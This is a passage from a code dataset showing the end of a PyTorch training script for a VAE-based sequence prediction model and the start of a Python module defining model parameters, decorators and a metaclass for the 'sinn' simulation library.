normalize_data(seq_test, mean)\n\n\ndataloader_train = DataLoader(seq_train, 32, True, drop_last=True)\ndataloader_test = DataLoader(seq_test, 32, True, drop_last=True)\nepochs = 51\ntrain_losses = np.zeros(epochs)\ntrain_nce = np.zeros(epochs)\ntrain_recon = np.zeros(epochs)\nuse_same_input = False\n# torch.manual_seed(2020)\n\nif use_same_input:\n # only one data, check if the model can overfit\n # data = torch.stack([torch.tensor(seq_train[0]) for _ in range(128)])np.max(1, in_channels // 8)\n data = torch.tensor(seq_train[:32])\nvae = ConvVAE(input_channels=4).to(device)\nvae.load_state_dict(torch.load('../saved_models/VAN/VAE-VAN.torch'))\nm = 5\nn = 3\n\nmodel = MAPSED(vae, latent_shape=(2, 5, 5), m=m, n=n, lambda_contrast=0, contrast='inner').to(device)\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=1e-3)\n# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.9)\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=10, factor=0.1, verbose=True)\npytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\nprint(\"total # of trainable parameters: {}\".format(pytorch_total_params))\n\n\n\nmetrics = ['MSE', 'MAE']\ntrain_losses_dicts_mean = {me: [] for me in metrics}\ntrain_losses_dicts_var = {me: [] for me in metrics}\ntest_losses_dicts_mean = {me: [] for me in metrics}\ntest_losses_dicts_var = {me: [] for me in metrics}\n\nx_augs = []\nfor epoch in range(epochs):\n model.train()\n model.vae.eval()\n model.training = True\n running_train_loss = 0\n running_nce = 0\n running_recon = 0\n # running_diff = 0\n validate_loss = {me: [] for me in metrics}\n test_loss = {me: [] for me in metrics}\n for idx, seq in enumerate(dataloader_train):\n if use_same_input:\n seq = data\n # print(\"updating with data [{}/{}]\".format(idx+1, len(dataloader_train)))\n with torch.no_grad():\n angle = np.random.choice([0, 90, 180, 270])\n #training transform\n train_tf = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([angle, angle])])\n\n seq = seq.cuda().float()\n seq = train_tf(seq.view(-1,10,10)).view(seq.shape)\n\n indices = torch.randperm(m)\n x_aug = seq[:, :m].detach()[:, indices]\n optimizer.zero_grad()\n x = seq[:, :m]\n gt = seq[:, m:]\n y_pred, loss, nce_channel, recon_loss = model(x, gt_seq=gt, x_aug=x_aug)\n loss.backward()\n optimizer.step()\n running_train_loss += loss.data\n running_nce += nce_channel\n running_recon += recon_loss\n train_losses[epoch] = running_train_loss / len(dataloader_train)\n train_nce[epoch] = running_nce / len(dataloader_train)\n train_recon[epoch] = running_recon / len(dataloader_train)\n\n with torch.no_grad():\n for me in metrics:\n validate_loss[me].append(calculate_seq_loss(y_pred, gt, me))\n\n model.eval()\n model.training = False\n with torch.no_grad():\n for _, seq in enumerate(dataloader_test):\n seq = seq.cuda().float()\n x = seq[:, :m]\n gt = seq[:, m:]\n y_pred, loss, _, _ = model(x, gt)\n for me in metrics:\n test_loss[me].append(calculate_seq_loss(y_pred, gt, me))\n for me in metrics:\n train_losses_dicts_mean[me].append(np.mean(validate_loss[me]))\n train_losses_dicts_var[me].append(np.std(validate_loss[me]))\n test_losses_dicts_mean[me].append(np.mean(test_loss[me]))\n test_losses_dicts_var[me].append(np.std(test_loss[me]))\n\n if epoch % 10 == 0:\n print(\"Time:{}, Running epoch [{}/{}], training loss:{}, channel nce:{}, recon:{}, train MSE loss:{},\\\n test MSE loss:{}\".format(\n datetime.now(),\n 
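The augmentation above draws an angle from {0, 90, 180, 270} and applies torchvision's `RandomRotation([angle, angle])` to the reshaped tensor. Since every angle is a multiple of 90°, the same augmentation can be done exactly, with no interpolation, via `torch.rot90`; a sketch assuming the (batch, time, H, W) layout used here:

import torch

def rot90_augment(seq: torch.Tensor) -> torch.Tensor:
    k = int(torch.randint(0, 4, ()))           # number of quarter turns
    out = torch.rot90(seq, k, dims=(-2, -1))   # rotate the spatial dims
    if torch.rand(()) < 0.5:
        out = torch.flip(out, dims=(-1,))      # random horizontal flip
    return out

seq = torch.randn(32, 8, 10, 10)
assert rot90_augment(seq).shape == seq.shape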
epoch + 1, epochs,\n train_losses[epoch],\n train_nce[epoch],\n train_recon[epoch],\n train_losses_dicts_mean['MSE'][epoch],\n test_losses_dicts_mean['MSE'][epoch]))\n if epoch % 30 == 0:\n save_progress(model, train_losses[:epoch + 1], train_nce[:epoch + 1],\n train_recon[:epoch + 1], train_losses_dicts_mean, train_losses_dicts_var,\n test_losses_dicts_mean, test_losses_dicts_var)\n scheduler.step(train_losses[epoch])\n # scheduler.step()\nsave_progress(model, train_losses, train_nce, train_recon, train_losses_dicts_mean,\n train_losses_dicts_var, test_losses_dicts_mean, test_losses_dicts_var)\n\nprint(\"DONE\")\n","sub_path":"src/train_mapsed_VAN.py","file_name":"train_mapsed_VAN.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"336635848","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 17 2017\n\nCopyright 2017-2021 Alexandre René\n\nTODO\n----\n\n- At present, things like ``h for h in model.statehists`` will use __eq__\n for the ``in`` check, which for histories creates a dict and compares.\n Iterables like `statehists` should be something like a ``set``, such that\n this check then just compares identity / hashes.\n- Have one dictionary/SimpleNamespace storing all compilation variables.\n See comment under `class Model`\n\"\"\"\nfrom __future__ import annotations\n\nimport sys\nimport abc\nimport copy\nfrom collections import namedtuple, OrderedDict, ChainMap, defaultdict\nfrom collections.abc import (\n Sequence as Sequence_, Iterable, Callable as Callable_, Generator as Generator_)\nfrom warnings import warn, filterwarnings, catch_warnings\nimport logging\nimport inspect\nfrom inspect import isclass\nfrom itertools import chain, combinations\nfrom functools import partial, wraps\nimport textwrap\n\nimport numpy as np\nimport scipy as sp\n\nimport pydantic\nfrom pydantic import BaseModel, PrivateAttr, validator, root_validator\nfrom pydantic.typing import AnyCallable\nfrom pydantic.fields import ModelField\nfrom pydantic.utils import lenient_issubclass\nfrom typing import (\n Any, Optional, Union, ClassVar, Type, Tuple, Sequence, List, Dict, Set,\n Generator, Callable as Callable, NamedTuple)\nfrom types import SimpleNamespace\nfrom dataclasses import dataclass\nfrom parameters import ParameterSet\nfrom tabulate import tabulate\n\nimport theano_shim as shim\nimport mackelab_toolbox as mtb\nimport mackelab_toolbox.utils as utils\nimport mackelab_toolbox.theano\nimport mackelab_toolbox.typing\nimport mackelab_toolbox.iotools\nfrom mackelab_toolbox.theano import GraphCache, CompiledGraphCache\nfrom mackelab_toolbox.utils import class_or_instance_method\n\nimport sinn\nimport sinn.config as config\nimport sinn.common as com\nfrom sinn.axis import DiscretizedAxis, AbstractAxisIndex\nfrom sinn.histories import (\n History, TimeAxis, AutoHist, HistoryUpdateFunction, Series, Spiketrain)\nfrom sinn.kernels import Kernel\nfrom sinn.diskcache import diskcache\n\n# Import into namespace, so user code doesn't need to import utils\nfrom sinn.utils.pydantic import initializer, add_exclude_mask\n\nlogger = logging.getLogger(__name__)\n\n_models = {}\nregistered_models = _models.keys()\n # I don't really like this, but it works. 
Ideally it would be some kind\n # of read-only property of the module.\n # Registering models allows us to save the model name within a parameter\n # file, and write a function which can build the correct model\n # automatically based on only on that parameter file.\n # NOTE: sinn-full uses a much nicer mechanism of TaggedCollections\n # which mostly makes _models (and the functions below) obsolete.\n\nexpensive_asserts = True\n\nfailed_build_msg = (\n \"Failed to build the symbolic update. Make sure that the \"\n \"model's definition of State is correct: it should include \"\n \"enough histories to fully define the model's state and \"\n \"allow forward integration. If you are sure the problem is \"\n \"not your model, you may need to workaround the issue by \"\n \"defining a `symbolic_update` in your model class. \"\n \"Automatic construction of symbolic updates is still work in \"\n \"progress and not always possible.\")\n\ndef register_model(model, modelname=None):\n \"\"\"\n Register a subclass of Model.\n Typically this is called from the module which implements the subclass.\n If `modelname` is unspecified, `model`'s class name is used.\n \"\"\"\n global _models\n assert(isclass(model))\n if modelname is None:\n modelname = model.__name__\n assert(isinstance(modelname, str))\n _models[modelname] = model\n\ndef is_registered(modelname):\n \"\"\"Returns True if a model is registered with this name.\"\"\"\n global _models\n return modelname in _models\n\ndef get_model(modelname, *args, **kwargs):\n \"\"\"Retrieves the model associated with the model name. Same arguments as dict.get().\"\"\"\n global _models\n return _models.get(modelname, *args, **kwargs)\n\n# def nesteddictwalk(d, separator='.', terminate=()):\n# \"\"\"\n# Walk a nested dict structure, using a generator.\n# Values associated to keys matching one of the values in `terminate` are not\n# recursed into, even if they are dictionaries.\n#\n# Composite keys are created by joining each key to the key of the parent dict\n# using `separator`.\n#\n# .. 
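A short usage sketch of the registry helpers defined above. `register_model` only asserts that its argument is a class, so a toy stand-in suffices here; in practice one registers a `Model` subclass so that a model name stored in a parameter file can be resolved back to the class:

from sinn.models import register_model, is_registered, get_model

class MyModel:  # stand-in; real code would subclass sinn.models.Model
    pass

register_model(MyModel)                  # registered under its class name
assert is_registered('MyModel')
assert get_model('MyModel') is MyModel   # e.g. name read from a param file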
Note:: Copied from the parameters package (parameters.__init__.py), to\n# add the `terminate` argument.\n# \"\"\"\n# # Used in Model.__init__ to delay creation of update functions until all\n# # histories are created.\n# if isinstance(terminate, str):\n# terminate = [terminate]\n# for key1, value1 in d.items():\n# if isinstance(value1, dict) and key1 not in terminate:\n# for key2, value2 in nesteddictwalk(value1, separator, terminate=terminate): # recurse into subdict\n# yield \"%s%s%s\" % (key1, separator, key2), value2\n# else:\n# yield key1, value1\n\n# Parameters\n\n# TODO: A NumericModelParams type, automatically constructed with the same\n# fields as a model's ModelParams, but using non-symbolic types.\n# Replace all occurrences of IndexableNamespace with NumericModelParams\nfrom mackelab_toolbox.typing import IndexableNamespace\n\nclass ModelParamsMetaclass(pydantic.main.ModelMetaclass):\n # NB: Simply assigning to type_dict in a __init_subclass__ method doesn't\n # work with composite models\n @property\n def type_dict(cls):\n return dict(cls._nested_types())\n\nclass ModelParams(BaseModel, metaclass=ModelParamsMetaclass):\n \"Use the `.info()` method for a summary of expected parameters.\"\n type_dict: ClassVar[Dict[str,Type]]\n\n class Config:\n json_encoders = mtb.typing.json_encoders\n\n # Almost all models will use NumPy arrays for some of their parameters,\n # so it seems justified to include the deserializer in the base class\n @root_validator(pre=True)\n def deserialize_arrays(cls, values):\n for k, v in values.items():\n if mtb.typing.json_like(v, \"Array\"):\n values[k] = mtb.typing.Array.validate(v)\n return values\n\n def __init__(self, *args, **kwargs):\n # Reconstruct hierarchies from dotted parameter names\n kwargs = ParameterSet(kwargs)\n super().__init__(*args, **kwargs)\n\n @classmethod\n def _nested_types(cls):\n for θnm, field in cls.__fields__.items():\n if lenient_issubclass(field.type_, ModelParams):\n for subθnm, subT in field.type_._nested_types():\n yield f\"{θnm}.{subθnm}\", subT\n else:\n yield θnm, field.type_\n\n def get_values(self, borrow: bool=False): # -> NumericModelParams\n \"\"\"\n Helper method which calls `get_value` on each parameter.\n Returns a copy of the ModelParams, where each shared variable has\n been replaced by its current numeric value.\n\n Parameters\n ----------\n borrow:\n False: (Default) Force a copy of the data.\n True: Attempt to avoid a copy.\n Normally this is simply passed to the shared var's `get_value` method.\n \"\"\"\n d = {k: v.get_values(borrow=borrow) if isinstance(v, ModelParams) else\n v.get_value(borrow=borrow) if shim.isshared(v) else\n v if borrow else getattr(v, 'copy', lambda: copy.copy(v))()\n for k,v in self}\n return IndexableNamespace(**d)\n\n def _set_values(self, values: ModelParams, # TODO -> NumericModelParams\n must_set_all_params: bool=False,\n must_not_set_other_params: bool=True,\n borrow: bool=False):\n \"\"\"\n TODO: The annotation is not quite correct. Values should be Params-like,\n but contain no symbolic variables.\n (Typically, ModelParams subclasses _enforce_ certain params to be\n shared vars)\n Helper method which calls `set_value` on each parameter.\n For non-shared variables, the value is simply updated.\n Values are updated in place.\n\n .. 
Caution:: In almost all situations, one should call\n `model.update_params` rather than `_set_values` directly, as this will\n ensure that submodel parameters remain in sync.\n\n Parameters\n ----------\n values: Dictionary of values to set\n must_set_all_params:\n Whether the model params must be a subset of `values`.\n must_not_set_other_params:\n Whether `values` must be a subset of the model params.\n borrow:\n False: (Default) Force a copy of the data.\n True: Attempt to avoid a copy.\n Normally this is simply passed to the shared var's `get_value` method.\n \"\"\"\n if isinstance(values, dict):\n values_dict = values\n elif isinstance(values, SimpleNamespace):\n values_dict = values.__dict__\n elif isinstance(values, type(self)):\n values_dict = {k: v for k,v in values}\n else:\n # `self` is always a subclass, and we want `values` to be an instance of that subclass\n raise TypeError(f\"{type(self)}._set_values: `values` must be an \"\n f\"instance of {type(self)}, but is rather of type \"\n f\"{type(values)}.\")\n if must_set_all_params and not set(self.__fields__) <= set(values_dict):\n raise ValueError(\"The following parameters are missing: \"\n f\"{set(self.__fields__) - set(values_dict)}\")\n if must_not_set_other_params and not set(values_dict) <= set(self.__fields__):\n raise ValueError(f\"{type(self)} does not recognize the following parameters: \"\n f\"{sorted(set(values_dict) - set(self.__fields__))}.\\n\"\n f\"Expected parameters are: {sorted(set(self.__fields__))}.\")\n # Build hierarchies, in case `values` uses dotted keys\n values_dict = ParameterSet(values_dict)\n for k, v in values_dict.items():\n # Special path for nested models\n if isinstance(v, (dict, SimpleNamespace)):\n subΘ = getattr(self, k)\n assert isinstance(subΘ, ModelParams)\n subΘ._set_values(v, borrow=borrow,\n must_not_set_other_params=must_not_set_other_params,\n must_set_all_params=must_set_all_params)\n # Normal path\n else:\n self_v = getattr(self, k)\n if shim.isshared(self_v):\n self_v.set_value(v, borrow=borrow)\n else:\n if shim.is_graph_object(v):\n raise TypeError(\n f\"Parameter values provided to {type(self).__qualname__} \"\n \"must either be shared variables or plain Python \"\n \"or NumPy values. 
Theano expressions are not \"\n                        f\"supported.\\nReceived: {v}.\")\n                if not borrow:\n                    v = getattr(v, 'copy', lambda: copy.copy(v))()\n                setattr(self, k, v)\n\n    @staticmethod\n    def _param_desc(field: ModelField):\n        internal_name = (f\"stored as '{field.name}'\" if field.name != field.alias\n                         else \"\")\n        optional = \"optional\" if not field.required else \"\"\n        default = f\"default: {repr(field.default)}\" if field.default is not None else \"\"\n        extra = \", \".join(s for s in (internal_name, optional, default) if s)\n        if extra:\n            extra = f\" ({extra})\"\n        return field.alias, \": \" + field._type_display(), extra\n\n    # DEVNOTE: There’s a bit of redundancy here with Model’s `summarize` method\n    # Whether it makes sense to combine them is currently unclear to me\n    @classmethod\n    def info(cls, level: int=1, print: bool=True) -> Union[None, str]:\n        \"\"\"\n        Display summary information for this set of parameters.\n        :param:level: Controls the amount of information to display.\n           Level 0: Only display class name (similar to ``str(cls)``)\n           Level 1 (default): Display the list of parameters, along with their\n              type, default value and aliased name (if applicable)\n        :param:print: Whether to print the result (default; returns `None`)\n           or to return it as a string\n\n        \"\"\"\n        import builtins\n        text = cls.__qualname__\n        if level > 0:\n            param_list = tabulate(\n                [cls._param_desc(field) for field in cls.__fields__.values()],\n                tablefmt='plain')\n            text += \"\\n\" + textwrap.indent(param_list, \"  \")\n        if print:\n            builtins.print(text)\n        else:\n            return text\n\nclass SubmodelParams(ModelParams):\n    \"\"\"\n    Class used as a placeholder for parameters of a submodel of unknown type.\n\n    This performs no parameter validation (since it does not know the expected\n    parameters). It simply assumes that all provided values are valid, and\n    provides the same interface as `ModelParams`.\n\n    Typically, when a `Model` is instantiated which contains submodels, their\n    `SubmodelParams` are automatically replaced by the appropriate `ModelParams`.\n\n    .. Note:: For consistency, `SubmodelParams` always returns its parameters\n       with parameter names in lexicographical order.\n\n    .. Caution:: Support for generic submodels is still at the proof-of-concept\n       stage. While the goal is eventually to treat a submodel type as a true generic\n       type, at present submodels are just typed as `Model`, and updating the\n       Parameters with the submodel's Parameters classes is done during model\n       instantiation (instead of during *class creation*, as could be done with\n       a generic type). This also means that an *instance's* `Parameters` class\n       is distinct from the *class'* `Parameters` class.\n\n\n    Example usage::\n\n        >>> from sinn.models import Model, SubmodelParams\n        >>>\n        >>> class MyModel(Model):\n        >>>     class Parameters:\n        >>>         sub: SubmodelParams\n        >>>     sub: Model\n        >>>\n        >>> class MySubmodel(Model):\n        >>>     class Parameters:\n        >>>         a: int\n        >>>         b: float\n        >>>\n        >>> subΘ = MySubmodel.Parameters(a=1, b=3.)\n        >>> submodel = MySubmodel(..., params=subΘ)\n        >>> model = MyModel(..., sub=submodel, params={'sub': subΘ})\n    \"\"\"\n    # TODO: If we support true generic submodels, we may not need to assign\n    #       to the instance's `self.Parameters`. In that case, we can remove the\n    #       exclusion of \"Parameters\" in `dict()`.\n    class Config:\n        extra = 'allow'\n    # DEVNOTE: The order of non-field attributes (those allowed by\n    #     extra = 'allow') is undefined. 
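A hedged sketch of the value round-trip these methods provide: `get_values` returns plain numeric copies (calling `get_value` on shared variables), and `_set_values` writes updates back in place, here with a partial dictionary. `ΘDemo` is a hypothetical parameter set:

from sinn.models import ModelParams

class ΘDemo(ModelParams):
    a: float
    b: float

θ = ΘDemo(a=1.0, b=2.0)
vals = θ.get_values()        # plain numeric copies in a namespace
θ._set_values({'a': 3.0})    # partial in-place update; b is untouched
assert θ.a == 3.0 and θ.b == 2.0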
Even when attributes are added in the\n # same order, they may be returned in different orders when iterating.\n # This is why we define __iter__ and dict() below.\n def __iter__(self):\n values = {k: v for k,v in super().__iter__()}\n for k in sorted(values):\n yield k, values[k]\n def dict(self, **kwargs):\n d = super().dict(**kwargs)\n return {k: d[k] for k in sorted(d)}\n def _set_values(self, values,\n must_set_all_params=False,\n must_not_set_other_params=False,\n borrow=False):\n \"\"\"\n Wrapper for `ModelParams._set_values` which always sets\n `must_not_set_other_params` and `must_set_all_params` to False.\n Since a `SubmodelParams` is a placeholder, it does not know the expected\n parameters and thus cannot validate that they match those provided.\n \"\"\"\n return super()._set_values(\n values, must_set_all_params=False, must_not_set_other_params=False, borrow=borrow)\n\n # Override the Pydantic default, which fails because when it doesn't find attributes in __fields__\n def __repr_args__(self) -> 'ReprArgs':\n return [(k, v) for k, v in self.__dict__.items()\n if getattr(self.__fields__.get(k), 'field_info.repr', True)]\n\nModelParams.update_forward_refs()\nSubmodelParams.update_forward_refs()\n\n# Model decorators\n\n## updatefunction decorator\n\n# PendingUpdateFunction = namedtuple('PendingUpdateFunction',\n# ['hist_nm', 'inputs', 'upd_fn'])\n@dataclass\nclass PendingFunction:\n hist_nm: str\n inputs : List[str]\n fn : Callable\n def __call__(self, model, k):\n return self.fn(model, k)\n@dataclass\nclass PendingUpdateFunction(PendingFunction):\n pass\n# @dataclass\n# class PendingDerivativeFunction(PendingFunction):\n# hist_nm: Tuple[str]\n\n# If `f` is an update function, then x[k+1] = f(k+1)\ndef updatefunction(hist_nm: str, inputs: List[str]):\n \"\"\"\n Decorator. Attaches the following function to the specified history,\n once the model is initialized.\n \"\"\"\n if not isinstance(hist_nm, str) or not isinstance(inputs, (list, tuple)):\n raise ValueError(\"updatefunction decorator must be used as \\n\"\n \" @updatefunction('hist_nm', inputs=['hist1', hist2'])\\n\"\n \" def hist_update(self, tidx):\\n\"\" …\")\n def dec(upd_fn):\n return PendingUpdateFunction(hist_nm, inputs, upd_fn)\n return dec\n\n# TODO: Automatic translation to an update function\n# If `f` is a derivative, then x[k+1] = x[k] + f(k)*Δt\ndef derivative(hist_nm: Union[str, Tuple[str]], inputs: List[str]):\n \"\"\"\n Decorator. Indicates that the following function ``f`` is the derivative of\n the specified history `hist_nm`. When the model is initialized, the\n corresponding update function (i.e. ``h[t] = h[t-1] + f(t)*Δt``) will be\n attached to `hist_nm`.\n\n .. warning:: This decorator still WIP and highly experimental. At present\n it just adds it to the '_derivatives' dictionary.\n\n Planned:\n - Construct `updatefunction` from a `derivative` using Euler scheme.\n - Support for different integration schemes. Explicit schemes which\n do not require evaluations at intermediate points should be trivial to\n implement (they are just a different update equation to Euler). Other\n schemes may require more work, or need to limit themselves to special cases\n (e.g. 
only derivatives which don't depend on other histories).\n \"\"\"\n # For consistency, we always use a tuple as key, to allow higher order derivatives\n if isinstance(hist_nm, str):\n hist_nm = (hist_nm,)\n def dec(f):\n f._derivative = hist_nm\n f._inputs = inputs\n return f\n return dec\n\n@dataclass\nclass DerivativesView:\n model: Model\n def __getitem__(self, histnm):\n if isinstance(histnm, str):\n histnm = (histnm,)\n fn_nm = self.model._derivatives[histnm].__name__ # _derivatives contains the *plain functions* attached to the *class*\n return getattr(self.model, fn_nm) # returns the same-named *method* attached to the *instance*\n\n# This text is added to the docstring of each model\n__model_docstring_footer__ = textwrap.dedent(\"\"\"\n .. Warning::\n If you need to set the model to a predictable state, use the provided\n `~Model.reseed_rngs` method. Simply setting the state of `self.rng`\n will work for NumPy RNGs, but not symbolic ones.\"\"\")\n\nclass ModelMetaclass(pydantic.main.ModelMetaclass):\n\n def _param_typedict(params: Union[Model,Type[Model],Type[ModelParams]]):\n if isinstance(params, Model) or lenient_issubclass(params, Model):\n params = params.Parameters\n for θnm, field in params.__fields__.items():\n if lenient_issubclass(field.type_, ModelParams):\n for subθnm, subT in get_param_types(field.type_):\n yield f\"{θnm}.{subθnm}\", subT\n else:\n yield θnm, field.type_\n\n # Partial list of magical things done by this metaclass:\n # - Transform a plain `Parameters` class into a pydantic BaseModel\n # (specifically, ModelParams)\n # - Add the `params: Parameters` attribute to the annotatons.\n # Ensure it inherits from the changed `Parameters`\n # - Move `params` to the front of the annotations list, so it is available\n # to validators.\n # - Add the `time` annotation if it isn't already present.\n def __new__(metacls, cls, bases, namespace):\n if '__throwaway_class' in namespace:\n # During MRO resolution, we need to create a throwaway class to\n # determine the MRO of the final class. 
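A schematic sketch of how `@updatefunction` is meant to appear inside a model definition, following the usage shown in its docstring. Everything here is illustrative: the model, the Euler step, and the `self.params.λ` / `self.time.dt` accesses are assumptions, not code from this library:

class LeakyDecay(Model):  # hypothetical model
    time: TimeAxis
    x: Series

    class Parameters(ModelParams):
        λ: float

    @updatefunction('x', inputs=['x'])
    def x_upd(self, tidx):
        # assumed Euler step: x[k] = x[k-1]·(1 - λ·Δt)
        return self.x[tidx - 1] * (1 - self.params.λ * self.time.dt)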
In that case we want to\n # skip all the metaclass activity because\n # 1) It's wasteful to do all the annotation/parameter parsing\n # 2) It would attempt to create its own throwaway class,\n # leading to infinite recursion\n return super().__new__(metacls, cls, bases, namespace)\n\n # Make a copy of namespace, so we can modify it below\n namespace = namespace.copy()\n\n # MRO resolution\n # We will need to retrieve attributes which may be anywhere in the MRO.\n # USE: Sanity checks, retrieve `Parameters`, inherited annotations\n # NOTE: type.mro(metacls) would return the MRO of the metaclass, while\n # we want that of the still uncreated class.\n # Option 1: Create a new throwaway class, and use its `mro()` method\n # Implementation: type('temp', bases, namespace)\n # Problem: Infinite recursion if Model is within `bases`\n # Option 2: Force `bases` to have one element, and call its `mro()`\n # Implementation: bases[0].mro()\n # Problem: Multiple inheritance of models is no longer possible.\n # # At the moment I begrudgingly went with Option 2, because I'm not sure\n # # of a use case for multiple inheritance.\n # nonabcbases = tuple(b for b in bases if b is not abc.ABC)\n # if len(nonabcbases) != 1:\n # from inspect import currentframe, getframeinfo\n # import pathlib\n # path = pathlib.Path(__file__).absolute()\n # frameinfo = getframeinfo(currentframe())\n # info = f\"{path}::line {frameinfo.lineno}\"\n # basesstr = ', '.join(str(b) for b in nonabcbases)\n # raise TypeError(\n # f\"Model {cls} has either no or multiple parents: {basesstr}.\\n\"\n # \"Models must inherit from exactly one class (eventually \"\n # \"`sinn.models.Model`). This is a technical limitation rather \"\n # \"than a fundamental one. If you need multiple inheritance for \"\n # f\"your model, have a look at the comments above {info}, and \"\n # \"see if you can contribute a better solution.\")\n # mro = bases[0].mro()\n # The solution below at least allows for multiple inheritance with\n # mixin classes\n try:\n Tmp = type('Tmp', bases, {**namespace, **{'__throwaway_class': None}})\n mro = Tmp.mro()[1:] # Exclude 'temp' throwaway class from MRO\n except TypeError as e:\n nonabcbases = tuple(b for b in bases if b is not abc.ABC)\n basesstr = ', '.join(str(b) for b in nonabcbases)\n if \"multiple bases have instance lay-out conflict\" in str(e):\n raise TypeError(\n f\"Model {cls} may have multiple parents inheriting \"\n \"from sinn.Model. Because sinn Models use __slots__, they \"\n \"cannot be used this way. If your goal is to define \"\n \"variants by changing some of the definitions of a model, \"\n \"consider defining those changes in a mixin class instead. 
\"\n \"As long as the mixin doesn't define __slots__, multiple \"\n \"inheritance with it should work.\"\n ) from e\n else:\n raise e\n\n # Existing attributes\n # (ChainMap gives precedence to elements earlier in the list)\n annotations = namespace.get('__annotations__', {})\n inherited_annotations = ChainMap(*(getattr(b, '__annotations__', {})\n for b in mro))\n all_annotations = ChainMap(annotations, inherited_annotations)\n inherited_kernel_identifiers = set(chain.from_iterable(\n _get_inherited_kernels(b) for b in bases))\n inherited_hist_identifiers = set(chain.from_iterable(\n _get_inherited_hists(b) for b in bases))\n inherited_pending_updates = dict(ChainMap(\n *({obj.hist_nm: obj for obj in _get_inherited_updates(b)}\n for b in bases)))\n inherited_derivatives = dict(ChainMap(\n *(_get_inherited_derivatives(b) for b in bases)))\n # NB: Although the _order_ of a ChainMap is set by iterating over\n # bases left-to-right, the _precedence_ of values goes\n # right-to-left.\n # This makes it comparable to a chain of .update() calls.\n # Old version which didn't work with mixins:\n # # (We only iterate over immediate bases, since those already contain\n # # the values for their parents.)\n # inherited_kernel_identifiers = set(chain.from_iterable(\n # getattr(b, '_kernel_identifiers', []) for b in bases[::-1]))\n # inherited_hist_identifiers = set(chain.from_iterable(\n # getattr(b, '_hist_identifiers', []) for b in bases[::-1]))\n # inherited_pending_updates = dict(ChainMap(\n # *({obj.hist_nm: obj for obj in getattr(b, '_pending_update_functions', [])}\n # for b in bases[::-1])))\n\n # Resolve string annotations (for 3.9+, annotations are always strings)\n # FIXME: Does it make sense to resolve these with the namespace of metacls.__module__ ?\n # A few lines below we do this again with the module’s namespace, which seems more sensible\n for nm, annot in annotations.items():\n if isinstance(annot, str):\n # To support forward refs, we leave as-is if undefined\n # Certain annotations (e.g. time) we need immediately, which\n # is why we do this before the class is defined\n annotations[nm] = sys.modules[metacls.__module__].__dict__.get(annot, annot)\n\n # Structures which accumulate the new class attributes\n new_annotations = {}\n _kernel_identifiers = inherited_kernel_identifiers\n _hist_identifiers = inherited_hist_identifiers\n _model_identifiers = {} # Use dict as an ordered set\n _pending_update_functions = inherited_pending_updates\n _derivatives = inherited_derivatives\n # pending updates use a dict to allow derived classes to override\n\n # Model validation\n ## Disallowed attributes\n for attr in ['ModelClass']:\n if attr in annotations:\n raise TypeError(f\"The attribute '{attr}' is disallowed for \"\n \"subclasses of 'sinn.models.Model'.\")\n\n # Replace any unnecessarily 'stringified' types\n # (Sometimes, even if types are in the namespace, they still\n # get set as strings in the annotations)\n # c.f. 
pydantic.main.update_forward_refs & pydantic.typing.evaluate_forwardref\n globalns = sys.modules[namespace.get('__module__', 'builtins')].__dict__\n # We don’t really insist on searching builtins: alternative would be\n # to make `globalns` an empty dict if '__module__' isn’t defined.\n for nm, T in annotations.items():\n if isinstance(T, str):\n annotations[nm] = globalns.get(T, T)\n\n ## `time` parameter\n if 'time' not in all_annotations:\n annotations['time'] = TimeAxis\n else:\n if (not isinstance(all_annotations['time'], type)\n or not issubclass(all_annotations['time'], DiscretizedAxis)):\n raise TypeError(\n \"`time` attribute must be an instance of `DiscretizedAxis` \"\n f\"(it has type {type(all_annotations['time'])}); \"\n \"in general `histories.TimeAxis` is an appropriate type.\")\n # ## 'initialize' method\n # if not isinstance(namespace.get('initialize', None), Callable):\n # raise TypeError(f\"Model {cls} does not define an `initialize` \"\n # \"method.\")\n\n # Add module-level annotations\n\n # --- From this point: annotations -> new_annotations ---\n\n # TODO?: Allow derived classes to redefine histories ?\n # We would just need to add the inherited kernel/hists after this loop\n for nm, T in annotations.items():\n if nm in new_annotations:\n raise TypeError(f\"Name clash in {cls} definition: '{nm}'\")\n new_annotations[nm] = T\n if isinstance(T, type) and issubclass(T, History):\n _hist_identifiers.add(nm)\n elif isinstance(T, type) and issubclass(T, Kernel):\n _kernel_identifiers.add(nm)\n elif isinstance(T, type) and cls != 'Model' and issubclass(T, Model):\n _model_identifiers[nm] = None # We use dict as an ordered set\n elif isinstance(T, PendingUpdateFunction):\n # FIXME: Remove. I don't remember why I originally put this branch\n raise AssertionError(\"Leftover PendingUpdateFunction\")\n # _pending_update_functions.append(obj)\n\n # Sanity check State subclass\n State = namespace.get('State', None)\n if State is None:\n for C in mro:\n State = getattr(C, 'State', None)\n if State is not None:\n break\n\n if abc.ABC in bases:\n # Deactivate warnings for abstract models\n pass\n elif State is None:\n if len(_hist_identifiers) > 0:\n # If there are no histories, it makes sense not to specify a State\n # This can happen for models which just combine submodels\n warn(f\"Model {cls} does not define a set of state variables.\")\n State = type('State', (), {'__annotations__': {}})\n namespace['State'] = State\n elif not hasattr(State, '__annotations__'):\n # We end up with sate-less histories, which are indicated with an empty State class\n State.__annotations__ = {}\n elif len(getattr(State, '__annotations__', {})) == 0:\n pass\n # warn(f\"Model {cls} has an empty `State` class.\")\n else:\n if issubclass(State, BaseModel):\n raise TypeError(f\"Model {cls} `State` must be a plain class, \"\n f\"not a Pydantic BaseModel.\")\n # if len(_hist_identifiers) == 0:\n # raise TypeError(\n # f\"Model {cls}: Variables declared in `State` are not all \"\n # \"declared as histories in the model.\")\n # Resolve string annotations (for 3.9+, annotations are always strings)\n for nm, annot in State.__annotations__.items():\n if isinstance(annot, str):\n # State.__annotations__[nm] = sys.modules[metacls.__module__].__dict__.get(annot, annot)\n State.__annotations__[nm] = globalns.get(annot, annot)\n for nm, T in State.__annotations__.items():\n histT = all_annotations.get(nm, None)\n if histT is None:\n raise TypeError(\n f\"Model {cls}: `State` defines '{nm}', which is not \"\n 
